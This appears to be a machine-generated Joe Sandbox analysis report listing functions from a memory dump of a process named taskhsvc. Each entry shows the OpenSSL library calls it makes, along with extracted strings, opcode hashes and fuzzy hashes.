                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_new_nullsk_numsk_push
                                                            • String ID:
                                                            • API String ID: 2969076029-0
                                                            • Opcode ID: dfd611522169556d39384b724ba0dd4500ad9118010d08dda10d7f4035f297ce
                                                            • Instruction ID: a0c6e24bea90f43c5a64aee336141058e2d78478da0ad4bd41fa4606e852ef3f
                                                            • Opcode Fuzzy Hash: dfd611522169556d39384b724ba0dd4500ad9118010d08dda10d7f4035f297ce
                                                            • Instruction Fuzzy Hash: 753104706097459BDB40EF35C68074BBBF8BF89348F269A1CE994CB700E735E9058B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: o$|
                                                            • API String ID: 1767461275-345082302
                                                            • Opcode ID: 9a606b7877471b2d0255f441c09648bdb06d5f4586554bb1bb8d81c2fc6cd22e
                                                            • Instruction ID: 5464bc8a6998ac970e39dce57563475ac2dc78c994c61b688ac8baa94f092f42
                                                            • Opcode Fuzzy Hash: 9a606b7877471b2d0255f441c09648bdb06d5f4586554bb1bb8d81c2fc6cd22e
                                                            • Instruction Fuzzy Hash: 00518C712057468BDB00DF28C48575BBBF1BF89388F25CA6CE8988BB94D775E904CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF6C8BB
                                                            • EVP_CIPHER_CTX_block_size.LIBEAY32 ref: 6CF6C8F4
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF6C90E
                                                            • EVP_CipherUpdate.LIBEAY32 ref: 6CF6C938
                                                            • EVP_CipherFinal_ex.LIBEAY32 ref: 6CF6C953
                                                            • EVP_CIPHER_CTX_cleanup.LIBEAY32 ref: 6CF6C97B
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF6C9A3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6C9CF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA07
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF6CA23
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA4F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6CA87
                                                            • EVP_PBE_CipherInit.LIBEAY32 ref: 6CF6C8E4
                                                              • Part of subcall function 6CEF3070: OBJ_obj2nid.LIBEAY32 ref: 6CEF30BD
                                                              • Part of subcall function 6CEF3070: ERR_put_error.LIBEAY32 ref: 6CEF30F1
                                                              • Part of subcall function 6CEF3070: i2t_ASN1_OBJECT.LIBEAY32 ref: 6CEF3111
                                                              • Part of subcall function 6CEF3070: ERR_add_error_data.LIBEAY32 ref: 6CEF3129
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$Cipher$O_free$Final_exInitJ_obj2nidO_mallocR_add_error_dataUpdateX_block_sizeX_cleanupX_initi2t_
                                                            • String ID: e$j$j$l$u
                                                            • API String ID: 77179880-1386408374
                                                            • Opcode ID: a4062dd3ae0b340409a700c8245888c8c6db627f5a9576bf76f03c3a45acd17d
                                                            • Instruction ID: 70380aca0dcf6b5e94422100feaaad7824b9d7fd657469d4ef6e666466519dfa
                                                            • Opcode Fuzzy Hash: a4062dd3ae0b340409a700c8245888c8c6db627f5a9576bf76f03c3a45acd17d
                                                            • Instruction Fuzzy Hash: 6231CCB55093419FD720DF2AC58069BFBF4AF88744F11892EE9D987700E770E844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_new_ex_dataR_put_error
                                                            • String ID: S$i$m
                                                            • API String ID: 1702480789-321681027
                                                            • Opcode ID: 13f5e50e12299b1329f8e0e665c97edd94fcbc6a4309c1b165b253438020e4c2
                                                            • Instruction ID: 44e797905e1fca6f0c663bfd3618ca5014a8acf4a85254efb02d05dda212eb89
                                                            • Opcode Fuzzy Hash: 13f5e50e12299b1329f8e0e665c97edd94fcbc6a4309c1b165b253438020e4c2
                                                            • Instruction Fuzzy Hash: 6D1104B15193008FDB509F28E58434BBBF4EB49348F16C95DE8A88B744E775D9488FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$sk_value$lh_freesk_freesk_num
                                                            • String ID:
                                                            • API String ID: 3945219446-0
                                                            • Opcode ID: a5f9d1313875a74777359ed2798103018531961475535b8b828a69983b0d24f8
                                                            • Instruction ID: df4f33ef843da0c86ce1f40754c6c77383c6bfaede1a8b851941a418de7d248e
                                                            • Opcode Fuzzy Hash: a5f9d1313875a74777359ed2798103018531961475535b8b828a69983b0d24f8
                                                            • Instruction Fuzzy Hash: 58312974609B018BDB10DF7AC08465BB7F1AF84718F228A2DE9E58BF44D772E8458B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$O_realloc
                                                            • String ID: e
                                                            • API String ID: 1506631173-4024072794
                                                            • Opcode ID: cfb08acaa75577074f750206fc87f82a6fdf9f67e541578d9a26172c868343df
                                                            • Instruction ID: 9afcbd6fa55eebd2d5a1e3516698901b9e5b47138557bce8eb3fe37cd455ae6a
                                                            • Opcode Fuzzy Hash: cfb08acaa75577074f750206fc87f82a6fdf9f67e541578d9a26172c868343df
                                                            • Instruction Fuzzy Hash: 71410FB16043018FDB00CF29C98874ABBF0AF89318F26C569E9888F745D379E905CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OPENSSL_gmtime.LIBEAY32 ref: 6CEFAFD4
                                                              • Part of subcall function 6CE26EC0: gmtime.MSVCRT ref: 6CE26EDC
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CEFB0D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_type_newL_gmtimegmtime
                                                            • String ID: A$s
                                                            • API String ID: 3530809405-3070099397
                                                            • Opcode ID: 6b981ec93dffef46e8501a291c1cc27634233899de9a6e19f3e2b97576d72206
                                                            • Instruction ID: 705cd8f6b0173cfd9dcdf65398959075c17b46fa93139e3cd4b54e6b9944f748
                                                            • Opcode Fuzzy Hash: 6b981ec93dffef46e8501a291c1cc27634233899de9a6e19f3e2b97576d72206
                                                            • Instruction Fuzzy Hash: 9231C0B1609701CFD710DF29C58065BBBF4AF88758F21892DE4A88BB00E735E8499F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_nnmod
                                                            • String ID:
                                                            • API String ID: 1640933438-0
                                                            • Opcode ID: b69ef7e2f585053a84459a3332655551670263b0fa01afef81274690ecf7150c
                                                            • Instruction ID: 47794130ef4069ff527e6697d07cc5297d11219f560087e647aee23faad01e32
                                                            • Opcode Fuzzy Hash: b69ef7e2f585053a84459a3332655551670263b0fa01afef81274690ecf7150c
                                                            • Instruction Fuzzy Hash: 4BD14A7160A7418FD304CF19C98065AB7F2FF89318F29C92DE8998B751D735E846CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF1CF87
                                                            • X509_ALGOR_new.LIBEAY32 ref: 6CF1CF9C
                                                              • Part of subcall function 6CF04370: ASN1_item_new.LIBEAY32 ref: 6CF04385
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF1CFAF
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF1D057
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$G_type_newN1_item_newR_newR_put_errorX509_
                                                            • String ID: A$m
                                                            • API String ID: 3201979453-1290977958
                                                            • Opcode ID: 0521b1d550938cf9a705dca90b010af9da02c268ecfc8ad66e54a26d681d79db
                                                            • Instruction ID: 1f2a1ee307aa95eb24af85203ab491357da466559b55b8062afc23b03b905c38
                                                            • Opcode Fuzzy Hash: 0521b1d550938cf9a705dca90b010af9da02c268ecfc8ad66e54a26d681d79db
                                                            • Instruction Fuzzy Hash: CA2127B12193018FEB00DF24D49434B7BF1AB44348F118A5DD9998FA89D7BAD54ACFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocR_put_error
                                                            • String ID: A$T$V
                                                            • API String ID: 2513334388-4191120472
                                                            • Opcode ID: 8dfdefde0a03cdc6394702fa3622e77ee90d774775e9dcff6a9567e25388fcc5
                                                            • Instruction ID: e3c71541d3810022cd67a06a4a880a59ef309d98ecf81aff1931d6975dd2efb7
                                                            • Opcode Fuzzy Hash: 8dfdefde0a03cdc6394702fa3622e77ee90d774775e9dcff6a9567e25388fcc5
                                                            • Instruction Fuzzy Hash: 5F11F372118702ABEB00DF66C64034BBBF4BB85308F02991CE6A89B640D774A5498BE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC63
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC6B
                                                            • ERR_put_error.LIBEAY32 ref: 6CE2AD1B
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AD2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_get_stateR_put_error
                                                            • String ID: A$e$s
                                                            • API String ID: 2813068925-4195972710
                                                            • Opcode ID: a98b83b9e40ec786742fce741f0ce47f2afbf43cac91087f52008ff3074a8fee
                                                            • Instruction ID: 3c1578f4879c9053efe09d451686a7c7106cf7b137735d54a5b7260c4ad028d6
                                                            • Opcode Fuzzy Hash: a98b83b9e40ec786742fce741f0ce47f2afbf43cac91087f52008ff3074a8fee
                                                            • Instruction Fuzzy Hash: 2EF07FB45487019AD700AF69C04135ABBF1BF84748F218D1DA4D857710C77E914A8F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d515d596a64d895aa5f5a01da0e2166dee4eeaf9f98bbdd7c413e8a497d63e
                                                            • Instruction ID: ed6ed308cda43f59929bcecf4a15b914b929b6704a54383c2334fc5bd5706b87
                                                            • Opcode Fuzzy Hash: a3d515d596a64d895aa5f5a01da0e2166dee4eeaf9f98bbdd7c413e8a497d63e
                                                            • Instruction Fuzzy Hash: 95416AB56097008FD710DF29C58074BBBF0BF99318F52881DEA9887710D735E844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_THREADID_current.LIBEAY32 ref: 6CE24F57
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE24F7B
                                                            • lh_delete.LIBEAY32 ref: 6CE24FD3
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE24FAC
                                                              • Part of subcall function 6CE237E0: CRYPTO_lock.LIBEAY32 ref: 6CE23FF5
                                                              • Part of subcall function 6CE237E0: CRYPTO_lock.LIBEAY32 ref: 6CE24022
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE24FF7
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE2501B
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE25066
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE2508F
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE250C7
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE250CF
                                                            • CRYPTO_THREADID_cmp.LIBEAY32 ref: 6CE250EB
                                                            • CRYPTO_lock.LIBEAY32 ref: 6CE25111
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free$D_cmpD_currentlh_delete
                                                            • String ID:
                                                            • API String ID: 2695962765-0
                                                            • Opcode ID: ee0b35d58a19523228c1586c8a732deadd1b2250f1124e9addf0cc317b5f6304
                                                            • Instruction ID: f5c9d881a774c9c0914ff79785f77607c11cf673280f4f3264f6054af50c5385
                                                            • Opcode Fuzzy Hash: ee0b35d58a19523228c1586c8a732deadd1b2250f1124e9addf0cc317b5f6304
                                                            • Instruction Fuzzy Hash: 5A3113B1A197019BEB009F25C54579ABBF0FF80758F21880DE5988BB60D77DD444CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3239fc0895a711662d2bd268e3aed8dd9e14864ca9485bcd7018863a7d55d7ca
                                                            • Instruction ID: 1fd655ba70157b8a21d2d4e9710792e9d7a890d7dfab08e92248033355fae130
                                                            • Opcode Fuzzy Hash: 3239fc0895a711662d2bd268e3aed8dd9e14864ca9485bcd7018863a7d55d7ca
                                                            • Instruction Fuzzy Hash: A3B16A72605B068FD724CF29D98065AF7F1FB89318F25892DD569CBB00E731E846CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID: |
                                                            • API String ID: 1457121658-2343686810
                                                            • Opcode ID: d0197e34b932b8dd6897becadf134fae818659f273e73bdb0b35d4d04c852bb2
                                                            • Instruction ID: f4b1975b5564fb5002344a25ea911a8cd2486d5c463420355805e3625e3d24bc
                                                            • Opcode Fuzzy Hash: d0197e34b932b8dd6897becadf134fae818659f273e73bdb0b35d4d04c852bb2
                                                            • Instruction Fuzzy Hash: 7A412B71A087069FDB00CF29C58464AB7F1FF94348F22892DE9989B750D774ED468B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_num_bitsO_malloc
                                                            • String ID: 2$q
                                                            • API String ID: 2607601166-239356128
                                                            • Opcode ID: 2da88c9e09847059ab3a5ea62a4accf1ddd9b2de740d4b97d6c529e6f2d12b6a
                                                            • Instruction ID: d4a52063a058ab98a492022de71320d9063d232f7f6a9b80ece39614f33d7ad1
                                                            • Opcode Fuzzy Hash: 2da88c9e09847059ab3a5ea62a4accf1ddd9b2de740d4b97d6c529e6f2d12b6a
                                                            • Instruction Fuzzy Hash: 0841357160A3459FE750DF2AC58061BBBF4ABC9318F21AA2DE9E887710D734D945CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$g$x${${
                                                            • API String ID: 1767461275-644820815
                                                            • Opcode ID: ec382af22bb4f68cc980d16e04d12256dd0cbf8a2696b39e5243dc260f6fdc5c
                                                            • Instruction ID: d22237d3e4526978f4c1e06479d3cd4b19f35f6931c3730758be5d82b3bcd16b
                                                            • Opcode Fuzzy Hash: ec382af22bb4f68cc980d16e04d12256dd0cbf8a2696b39e5243dc260f6fdc5c
                                                            • Instruction Fuzzy Hash: 2F3106B4609301CFEB04EF25C18672ABBF1AB8534CF21C86DE8945BB54D3BA9545CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ERR_put_error.LIBEAY32 ref: 6CE2AC57
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC63
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2AC6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_get_stateR_put_error
                                                            • String ID: A$e$s
                                                            • API String ID: 2813068925-4195972710
                                                            • Opcode ID: 81a51805c3eaa3b468c8261409b51db716483a87037387ae76c38c77965af1f8
                                                            • Instruction ID: d4f333e209292a559d973f0067123bed882b448ff7c8506a0298e7a8bef49d48
                                                            • Opcode Fuzzy Hash: 81a51805c3eaa3b468c8261409b51db716483a87037387ae76c38c77965af1f8
                                                            • Instruction Fuzzy Hash: F9E0BDB04087009ED700AF28C14434BBBF0BF84398F128C0CA8C94B750C7BEA5898F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: L_init
                                                            • String ID:
                                                            • API String ID: 2485848262-0
                                                            • Opcode ID: f060aed1641d7c449fe2177e5b37300ccdb9f6fb93e7305a786881d18714b58f
                                                            • Instruction ID: 3b84ab3b34cfa9cd9c4fbcf27e3769896a6d6e9ea197183f2c698f6f1eb286df
                                                            • Opcode Fuzzy Hash: f060aed1641d7c449fe2177e5b37300ccdb9f6fb93e7305a786881d18714b58f
                                                            • Instruction Fuzzy Hash: 8D31F9356146008FDB10DF25C684B5BBBF5BB99328F52891CEAA597300D734F904CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc__stack_chk_faillh_doall_arglh_num_itemsqsort
                                                            • String ID:
                                                            • API String ID: 2966463834-0
                                                            • Opcode ID: 43bb805b856bf9980c6be874a29ac350522bd04dd28ef350a8f1e16e9d56232e
                                                            • Instruction ID: 34e3d3d36b4b84b15fd1235edae1c901be8b6577039087707a3d394d0db37c00
                                                            • Opcode Fuzzy Hash: 43bb805b856bf9980c6be874a29ac350522bd04dd28ef350a8f1e16e9d56232e
                                                            • Instruction Fuzzy Hash: 3821E0B55083018FC700DF69C48060BBBF4FB88358F21892EE9D887710E338E9498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc
                                                            • String ID:
                                                            • API String ID: 1457121658-0
                                                            • Opcode ID: 83a994dbae5e1d6b152c981295c79d74a2470d47f3d45aa4c76000a4e1071a71
                                                            • Instruction ID: e24f31c43f9f7cc31a3d666d678725608ab2ff9e8da7dd358a4e332627c3b209
                                                            • Opcode Fuzzy Hash: 83a994dbae5e1d6b152c981295c79d74a2470d47f3d45aa4c76000a4e1071a71
                                                            • Instruction Fuzzy Hash: 1011F5B1514A01CBDB10EF25C98478ABBF4BF48308F52881CDA949B744E334E509CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF6CE0D
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6D047
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_type_newO_mallocR_put_error
                                                            • String ID: A$l
                                                            • API String ID: 2512349753-1005974064
                                                            • Opcode ID: 67403571646e8b3e6e369dd821cab300231572e0fbaa72e4062e4cd34d241a7b
                                                            • Instruction ID: 56c4efb4d8a223aa541ab11dbccbcbb0f729f373a6d302f7a53d8ecf75fbd1e8
                                                            • Opcode Fuzzy Hash: 67403571646e8b3e6e369dd821cab300231572e0fbaa72e4062e4cd34d241a7b
                                                            • Instruction Fuzzy Hash: 7001E5B01093829FE720DF25C540B9BBBF4AB89308F12491DEAD887B40E375A544CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: A$u
                                                            • API String ID: 3192733237-1604213488
                                                            • Opcode ID: 9430d89839acada2864f98393f292f3697e090dc071443cc3b4d6853b1c5700e
                                                            • Instruction ID: 4eedddb397774b70133058bb01fcaa9ba67a5971bbcb6d459284a3d100fb3c09
                                                            • Opcode Fuzzy Hash: 9430d89839acada2864f98393f292f3697e090dc071443cc3b4d6853b1c5700e
                                                            • Instruction Fuzzy Hash: FD0129B56197119BD7009F35C98024FBBF4AF88758F11992EE988D7710E735D8418FC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_get_dynlock_valueOpen__stack_chk_fail
                                                            • String ID: cryptlib.c$pointer != NULL
                                                            • API String ID: 3168104378-1126093478
                                                            • Opcode ID: 7bc868406a3153b80e5c024d518734f3d760d1b1128610cb3eb6cdc9fb6bfa66
                                                            • Instruction ID: 38f3c2c78ac78db88195e9f07d8d65e51fe34a780b452616abc04980b2d4376e
                                                            • Opcode Fuzzy Hash: 7bc868406a3153b80e5c024d518734f3d760d1b1128610cb3eb6cdc9fb6bfa66
                                                            • Instruction Fuzzy Hash: B2F03771A187018BDB149F65D58435AFBF0FF81358F21881EEAA897A10C739E406DBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: C2_encrypt$__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2416772474-0
                                                            • Opcode ID: 53826052b66e63f7c3a0c8ccfe44512a8dda47d569105ffc3865fabed165bdb1
                                                            • Instruction ID: c13628da57d1184d9fa1cb1e6f35ed7d7dc754a64b2f0206dff53cd0daf4e62e
                                                            • Opcode Fuzzy Hash: 53826052b66e63f7c3a0c8ccfe44512a8dda47d569105ffc3865fabed165bdb1
                                                            • Instruction Fuzzy Hash: FBA1393520D7818FC315CF29818045BFFF1AFEA204F588A9DE9D597742D671E819CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509at_add1_attr_by_txt.LIBEAY32 ref: 6CEF2F98
                                                              • Part of subcall function 6CF3F790: OBJ_txt2obj.LIBEAY32 ref: 6CF3F7C9
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_txt2objX509at_add1_attr_by_txt
                                                            • String ID:
                                                            • API String ID: 734047113-0
                                                            • Opcode ID: 90dd150f5680bd137720f4189ce6aeaf8c3bae195ab99bcdeca3e873bdd0551d
                                                            • Instruction ID: 8201ef9d9727e5ec69a2701f4c711396d0e5bc900385cb00325ead1061d536f9
                                                            • Opcode Fuzzy Hash: 90dd150f5680bd137720f4189ce6aeaf8c3bae195ab99bcdeca3e873bdd0551d
                                                            • Instruction Fuzzy Hash: 2621C235608A409FD700DF39C28090AB7F1BB8A318F169A5CEAA8DB314D731E9018F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
